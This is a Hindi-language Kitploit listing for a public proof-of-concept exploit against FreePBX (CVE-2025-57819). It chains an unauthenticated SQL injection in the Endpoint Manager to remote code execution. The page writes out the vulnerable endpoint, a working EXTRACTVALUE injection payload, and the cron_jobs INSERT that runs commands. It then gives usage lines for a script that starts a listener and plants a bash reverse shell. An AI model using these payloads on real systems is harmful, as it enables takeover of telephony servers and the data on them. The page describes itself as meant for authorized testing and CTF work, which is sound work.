Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
उपकरण/GitHubGitHub/b4sh2/cve-2025-57819-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

रिपॉजिटरी देखें
72463 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-57819 — FreePBX अप्रमाणित SQLi → RCE

FreePBX Endpoint Manager की अप्रमाणित SQL इंजेक्शन (CVE-2025-57819) के लिए एक-शॉट एक्सप्लॉइट, जिसे FreePBX cron_jobs तालिका के माध्यम से रिमोट कोड निष्पादन में श्रृंखलित किया गया है।

केवल अधिकृत सुरक्षा परीक्षण / CTF उपयोग के लिए।


भेद्यता

एंडपॉइंट मॉड्यूल का ajax हैंडलर brand पैरामीटर को सीधे SQL क्वेरी में जोड़ता है, और मॉड्यूल पथ FreePBX\modules\endpoint\ajax ajax Referrer/प्रमाणीकरण जाँच को बायपास करता है। यह अप्रमाणित त्रुटि-आधारित SQL इंजेक्शन (EXTRACTVALUE के माध्यम से) देता है, जिसमें स्टैक्ड-क्वेरी राइट्स सक्षम हैं।

इंजेक्शन बिंदु:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

प्रमाण (त्रुटि-आधारित रीडआउट):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
टूल डाउनलोड करें

प्रभावित: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

RCE तकनीक

इंजेक्शन अपने आप में केवल-पढ़ने योग्य है, लेकिन स्टैक्ड क्वेरीज़ लिखने की अनुमति देती हैं। FreePBX अपने क्रॉन मैनेजर के माध्यम से cron_jobs तालिका से कार्य चलाता है, इसलिए एक पंक्ति सम्मिलित करने से मनमाना कमांड निष्पादन होता है (लगभग 60 सेकंड के भीतर, शेड्यूल * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

इंजेक्ट किया गया कमांड एक bash रिवर्स शेल है। बार-बार कनेक्शन से बचने के लिए पहली कॉलबैक के बाद क्रॉन पंक्ति स्वचालित रूप से हटा दी जाती है।

आवश्यकताएँ

root@kitploit:~
pip install requests urllib3

Python 3. बिल्ट-इन IP डिटेक्शन (-i/--interface) केवल Linux के लिए है; अन्य प्लेटफ़ॉर्म पर --ip का उपयोग करें।

उपयोग

root@kitploit:~
# Defaults: interface tun0, port 4444 — starts listener, exploits, drops a shell
python3 exploit.py http://{target}

# Pick a different interface / port
python3 exploit.py http://{target} -i eth0 -p 9001

# Set the listener IP explicitly
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

स्क्रिप्ट:

  1. SQLi की पुष्टि करता है (DB संस्करण लीक करता है)।
  2. चुने गए पोर्ट पर TCP लिसनर शुरू करता है।
  3. रिवर्स-शेल क्रॉन जॉब इंजेक्ट करता है और पंक्ति के आने की पुष्टि करता है।
  4. कॉलबैक के लिए ~70s प्रतीक्षा करता है, फिर आपको एक इंटरैक्टिव शेल में ड्रॉप करता है (स्वचालित PTY अपग्रेड प्रयास के साथ)।
  5. इंजेक्टेड क्रॉन पंक्ति को साफ करता है।

संदर्भ

  • Horizon3.ai — अपडेटेड FreePBX CVE: Auth Bypass & RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • FreePBX सलाहकार GHSA-m42g-xg4c-5f3h